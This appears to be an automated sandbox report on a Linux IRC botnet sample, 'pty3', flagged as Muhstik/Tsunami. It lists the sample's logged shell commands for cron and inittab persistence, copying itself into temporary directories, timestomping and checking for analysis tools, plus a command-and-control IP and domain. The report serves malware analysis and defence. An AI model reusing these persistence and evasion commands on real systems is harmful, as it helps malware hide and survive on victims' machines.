            Source: /bin/sh (PID: 5318)Crontab executable: /usr/bin/crontab -> crontab -lJump to behavior
            Source: /bin/sh (PID: 5317)Crontab executable: /usr/bin/crontab -> crontab -Jump to behavior
            Source: /bin/sh (PID: 5332)Crontab executable: /usr/bin/crontab -> crontab -lJump to behavior
            Source: /bin/sh (PID: 5338)Crontab executable: /usr/bin/crontab -> crontab -lJump to behavior
            Source: /bin/sh (PID: 5337)Crontab executable: /usr/bin/crontab -> crontab -Jump to behavior
            Source: /usr/bin/cp (PID: 5263)File written: /dev/shm/pty3Jump to dropped file
            Source: /usr/bin/cp (PID: 5284)File written: /var/tmp/pty3Jump to dropped file
            Source: /usr/bin/cp (PID: 5304)File written: /run/lock/pty3Jump to dropped file
            Source: /usr/bin/cp (PID: 5326)File written: /run/pty3Jump to dropped file
            Source: /bin/sh (PID: 5244)Grep executable: /usr/bin/grep -> grep /tmp/pty3Jump to behavior
            Source: /bin/sh (PID: 5246)Grep executable: /usr/bin/grep -> grep -v "no cron"Jump to behavior
            Source: /bin/sh (PID: 5243)Grep executable: /usr/bin/grep -> grep -v /tmp/pty3Jump to behavior
            Source: /bin/sh (PID: 5269)Grep executable: /usr/bin/grep -> grep /dev/shm/pty3Jump to behavior
            Source: /bin/sh (PID: 5270)Grep executable: /usr/bin/grep -> grep -v "no cron"Jump to behavior
            Source: /bin/sh (PID: 5272)Grep executable: /usr/bin/grep -> grep -v /dev/shm/pty3Jump to behavior
            Source: /bin/sh (PID: 5291)Grep executable: /usr/bin/grep -> grep /var/tmp/pty3Jump to behavior
            Source: /bin/sh (PID: 5292)Grep executable: /usr/bin/grep -> grep -v "no cron"Jump to behavior
            Source: /bin/sh (PID: 5289)Grep executable: /usr/bin/grep -> grep -v /var/tmp/pty3Jump to behavior
            Source: /bin/sh (PID: 5311)Grep executable: /usr/bin/grep -> grep /var/lock/pty3Jump to behavior
            Source: /bin/sh (PID: 5312)Grep executable: /usr/bin/grep -> grep -v "no cron"Jump to behavior
            Source: /bin/sh (PID: 5309)Grep executable: /usr/bin/grep -> grep -v /var/lock/pty3Jump to behavior
            Source: /bin/sh (PID: 5333)Grep executable: /usr/bin/grep -> grep /var/run/pty3Jump to behavior
            Source: /bin/sh (PID: 5334)Grep executable: /usr/bin/grep -> grep -v "no cron"Jump to behavior
            Source: /bin/sh (PID: 5331)Grep executable: /usr/bin/grep -> grep -v /var/run/pty3Jump to behavior
            Source: /usr/bin/crontab (PID: 5251)Crontab like entry written: /var/spool/cron/crontabs/tmp.l3d2DfJump to dropped file
            Source: /usr/bin/crontab (PID: 5274)Crontab like entry written: /var/spool/cron/crontabs/tmp.OnJidYJump to dropped file
            Source: /usr/bin/crontab (PID: 5295)Crontab like entry written: /var/spool/cron/crontabs/tmp.u6tmyyJump to dropped file
            Source: /usr/bin/crontab (PID: 5317)Crontab like entry written: /var/spool/cron/crontabs/tmp.pRPXldJump to dropped file
            Source: /usr/bin/crontab (PID: 5337)Crontab like entry written: /var/spool/cron/crontabs/tmp.qQwB9IJump to dropped file
            Source: /tmp/pty3 (PID: 5229)Shell command executed: sh -c "pidof -x strace > /dev/null"Jump to behavior
            Source: /tmp/pty3 (PID: 5232)Shell command executed: sh -c "pidof -x tcpdump > /dev/null"Jump to behavior
            Source: /tmp/pty3 (PID: 5239)Shell command executed: sh -c "crontab -r"Jump to behavior
            Source: /tmp/pty3 (PID: 5240)Shell command executed: sh -c "crontab -l | grep /tmp/pty3 | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /tmp/pty3 > /dev/null 2>&1 &\") | crontab -"Jump to behavior
            Source: /tmp/pty3 (PID: 5238)Shell command executed: sh -c "cat /etc/inittab | grep -v \"/tmp/pty3\" > /etc/inittab2"Jump to behavior
            Source: /tmp/pty3 (PID: 5249)Shell command executed: sh -c "echo \"0:2345:respawn:/tmp/pty3\" >> /etc/inittab2"Jump to behavior
            Source: /tmp/pty3 (PID: 5253)Shell command executed: sh -c "cat /etc/inittab2 > /etc/inittab"Jump to behavior
            Source: /tmp/pty3 (PID: 5255)Shell command executed: sh -c "rm -rf /etc/inittab2"Jump to behavior
            Source: /tmp/pty3 (PID: 5257)Shell command executed: sh -c "touch -acmr /bin/ls /etc/inittab"Jump to behavior
            Source: /tmp/pty3 (PID: 5261)Shell command executed: sh -c "cp -f /tmp/pty3 /dev/shm/pty3"Jump to behavior
            Source: /tmp/pty3 (PID: 5267)Shell command executed: sh -c "crontab -l | grep /dev/shm/pty3 | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /dev/shm/pty3 > /dev/null 2>&1 &\") | crontab -"Jump to behavior
            Source: /tmp/pty3 (PID: 5266)Shell command executed: sh -c "cat /etc/inittab | grep -v \"/dev/shm/pty3\" > /etc/inittab2"Jump to behavior
            Source: /tmp/pty3 (PID: 5276)Shell command executed: sh -c "echo \"0:2345:respawn:/dev/shm/pty3\" >> /etc/inittab2"Jump to behavior
            Source: /tmp/pty3 (PID: 5277)Shell command executed: sh -c "cat /etc/inittab2 > /etc/inittab"Jump to behavior
            Source: /tmp/pty3 (PID: 5279)Shell command executed: sh -c "rm -rf /etc/inittab2"Jump to behavior
            Source: /tmp/pty3 (PID: 5281)Shell command executed: sh -c "touch -acmr /bin/ls /etc/inittab"Jump to behavior
            Source: /tmp/pty3 (PID: 5283)Shell command executed: sh -c "cp -f /tmp/pty3 /var/tmp/pty3"Jump to behavior
            Source: /tmp/pty3 (PID: 5287)Shell command executed: sh -c "crontab -l | grep /var/tmp/pty3 | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /var/tmp/pty3 > /dev/null 2>&1 &\") | crontab -"Jump to behavior
            Source: /tmp/pty3 (PID: 5286)Shell command executed: sh -c "cat /etc/inittab | grep -v \"/var/tmp/pty3\" > /etc/inittab2"Jump to behavior
            Source: /tmp/pty3 (PID: 5293)Shell command executed: sh -c "echo \"0:2345:respawn:/var/tmp/pty3\" >> /etc/inittab2"Jump to behavior
            Source: /tmp/pty3 (PID: 5297)Shell command executed: sh -c "cat /etc/inittab2 > /etc/inittab"Jump to behavior
            Source: /tmp/pty3 (PID: 5299)Shell command executed: sh -c "rm -rf /etc/inittab2"Jump to behavior
            Source: /tmp/pty3 (PID: 5301)Shell command executed: sh -c "touch -acmr /bin/ls /etc/inittab"Jump to behavior
            Source: /tmp/pty3 (PID: 5303)Shell command executed: sh -c "cp -f /tmp/pty3 /var/lock/pty3"Jump to behavior
            Source: /tmp/pty3 (PID: 5307)Shell command executed: sh -c "crontab -l | grep /var/lock/pty3 | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /var/lock/pty3 > /dev/null 2>&1 &\") | crontab -"Jump to behavior
            Source: /tmp/pty3 (PID: 5306)Shell command executed: sh -c "cat /etc/inittab | grep -v \"/var/lock/pty3\" > /etc/inittab2"Jump to behavior
            Source: /tmp/pty3 (PID: 5315)Shell command executed: sh -c "echo \"0:2345:respawn:/var/lock/pty3\" >> /etc/inittab2"Jump to behavior
            Source: /tmp/pty3 (PID: 5319)Shell command executed: sh -c "cat /etc/inittab2 > /etc/inittab"Jump to behavior
            Source: /tmp/pty3 (PID: 5321)Shell command executed: sh -c "rm -rf /etc/inittab2"Jump to behavior
            Source: /tmp/pty3 (PID: 5323)Shell command executed: sh -c "touch -acmr /bin/ls /etc/inittab"Jump to behavior
            Source: /tmp/pty3 (PID: 5325)Shell command executed: sh -c "cp -f /tmp/pty3 /var/run/pty3"Jump to behavior
            Source: /tmp/pty3 (PID: 5329)Shell command executed: sh -c "crontab -l | grep /var/run/pty3 | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /var/run/pty3 > /dev/null 2>&1 &\") | crontab -"Jump to behavior
            Source: /tmp/pty3 (PID: 5328)Shell command executed: sh -c "cat /etc/inittab | grep -v \"/var/run/pty3\" > /etc/inittab2"Jump to behavior
            Source: /tmp/pty3 (PID: 5335)Shell command executed: sh -c "echo \"0:2345:respawn:/var/run/pty3\" >> /etc/inittab2"Jump to behavior
            Source: /tmp/pty3 (PID: 5339)Shell command executed: sh -c "cat /etc/inittab2 > /etc/inittab"Jump to behavior
            Source: /tmp/pty3 (PID: 5341)Shell command executed: sh -c "rm -rf /etc/inittab2"Jump to behavior
            Source: /tmp/pty3 (PID: 5343)Shell command executed: sh -c "touch -acmr /bin/ls /etc/inittab"Jump to behavior
            Source: /tmp/pty3 (PID: 5262)Shell command executed: sh -c "/bin/uname -n"Jump to behavior
            Source: /bin/sh (PID: 5256)Rm executable: /usr/bin/rm -> rm -rf /etc/inittab2Jump to behavior
            Source: /bin/sh (PID: 5280)Rm executable: /usr/bin/rm -> rm -rf /etc/inittab2Jump to behavior
            Source: /bin/sh (PID: 5300)Rm executable: /usr/bin/rm -> rm -rf /etc/inittab2Jump to behavior
            Source: /bin/sh (PID: 5322)Rm executable: /usr/bin/rm -> rm -rf /etc/inittab2Jump to behavior
            Source: /bin/sh (PID: 5342)Rm executable: /usr/bin/rm -> rm -rf /etc/inittab2Jump to behavior
            Source: /bin/sh (PID: 5258)Touch executable: /usr/bin/touch -> touch -acmr /bin/ls /etc/inittabJump to behavior
            Source: /bin/sh (PID: 5282)Touch executable: /usr/bin/touch -> touch -acmr /bin/ls /etc/inittabJump to behavior
            Source: /bin/sh (PID: 5302)Touch executable: /usr/bin/touch -> touch -acmr /bin/ls /etc/inittabJump to behavior
            Source: /bin/sh (PID: 5324)Touch executable: /usr/bin/touch -> touch -acmr /bin/ls /etc/inittabJump to behavior
            Source: /bin/sh (PID: 5344)Touch executable: /usr/bin/touch -> touch -acmr /bin/ls /etc/inittabJump to behavior
            Source: submitted sampleStderr: cat: /etc/inittabno crontab for rootno crontab for root: No such file or directoryno crontab for root: exit code = 0

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Uses known network protocols on non-standard portsShow sources
            Source: unknownNetwork traffic detected: IRC traffic on port 35994 -> 8080
            Source: unknownNetwork traffic detected: IRC traffic on port 35994 -> 8080
            Source: /bin/uname (PID: 5264)Queries kernel information via 'uname': Jump to behavior

            Stealing of Sensitive Information:

            barindex
            Yara detected MuhstikShow sources
            Source: Yara matchFile source: 5305.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 5285.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 5237.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 5236.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 5228.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 5265.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 5327.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 5259.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
            Yara detected TsunamiShow sources
            Source: Yara matchFile source: 5305.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 5285.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 5237.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 5236.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 5228.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 5265.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 5327.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 5259.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: pty3 PID: 5228, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: pty3 PID: 5236, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: pty3 PID: 5237, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: pty3 PID: 5259, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: pty3 PID: 5265, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: pty3 PID: 5285, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: pty3 PID: 5305, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: pty3 PID: 5327, type: MEMORYSTR

            Remote Access Functionality:

            barindex
            Yara detected MuhstikShow sources
            Source: Yara matchFile source: 5305.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 5285.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 5237.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 5236.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 5228.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 5265.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 5327.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 5259.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
            Yara detected TsunamiShow sources
            Source: Yara matchFile source: 5305.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 5285.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 5237.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 5236.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 5228.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 5265.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 5327.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 5259.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: pty3 PID: 5228, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: pty3 PID: 5236, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: pty3 PID: 5237, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: pty3 PID: 5259, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: pty3 PID: 5265, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: pty3 PID: 5285, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: pty3 PID: 5305, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: pty3 PID: 5327, type: MEMORYSTR

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsScheduled Task/Job11Scheduled Task/Job11Scheduled Task/Job11Scripting1OS Credential DumpingSecurity Software Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScripting1At (Linux)1At (Linux)1Timestomp1LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Standard Port11Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)1Logon Script (Windows)Logon Script (Windows)Indicator Removal on Host1Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)File Deletion1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud

            Malware Configuration

            No configs have been found

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Number of created Files
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 543493 Sample: pty3 Startdate: 21/12/2021 Architecture: LINUX Score: 96 107 144.172.71.180, 35994, 8080 GALAXYGATEUS United States 2->107 109 l.deutschland-zahlung.net 2->109 111 3 other IPs or domains 2->111 115 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->115 117 Multi AV Scanner detection for submitted file 2->117 119 Yara detected Tsunami 2->119 121 3 other signatures 2->121 11 pty3 2->11         started        signatures3 process4 process5 13 pty3 11->13         started        15 pty3 11->15         started        17 pty3 11->17         started        19 8 other processes 11->19 process6 21 pty3 13->21         started        23 pty3 13->23         started        25 pty3 13->25         started        36 25 other processes 13->36 27 pty3 sh 15->27         started        29 pty3 sh 17->29         started        31 sh touch 19->31         started        34 pty3 sh 19->34         started        38 6 other processes 19->38 signatures7 40 pty3 sh 21->40         started        42 pty3 sh 23->42         started        44 pty3 sh 25->44         started        46 sh crontab 27->46         started        56 4 other processes 27->56 50 sh crontab 29->50         started        127 Explicitly modifies time stamps using the "touch" command 31->127 52 sh uname 34->52         started        54 pty3 sh 36->54         started        58 24 other processes 36->58 process8 file9 60 sh crontab 40->60         started        72 4 other processes 40->72 64 sh crontab 42->64         started        74 4 other processes 42->74 66 sh crontab 44->66         started        76 4 other processes 44->76 97 /var/spool/cron/crontabs/tmp.l3d2Df, ASCII 46->97 dropped 129 Sample tries to persist itself using cron 46->129 131 Executes the "crontab" command typically for achieving persistence 46->131 68 sh crontab 54->68         started        78 4 other processes 54->78 70 sh crontab 56->70         started        99 /var/tmp/pty3, ELF 58->99 dropped 101 /run/pty3, ELF 58->101 dropped 103 /run/lock/pty3, ELF 58->103 dropped 105 2 other malicious files 58->105 dropped 133 Writes identical ELF files to multiple locations 58->133 135 Explicitly modifies time stamps using the "touch" command 58->135 signatures10 process11 file12 89 /var/spool/cron/crontabs/tmp.OnJidY, ASCII 60->89 dropped 123 Sample tries to persist itself using cron 60->123 125 Executes the "crontab" command typically for achieving persistence 60->125 91 /var/spool/cron/crontabs/tmp.u6tmyy, ASCII 64->91 dropped 93 /var/spool/cron/crontabs/tmp.pRPXld, ASCII 66->93 dropped 95 /var/spool/cron/crontabs/tmp.qQwB9I, ASCII 68->95 dropped 80 sh crontab 72->80         started        83 sh crontab 74->83         started        85 sh crontab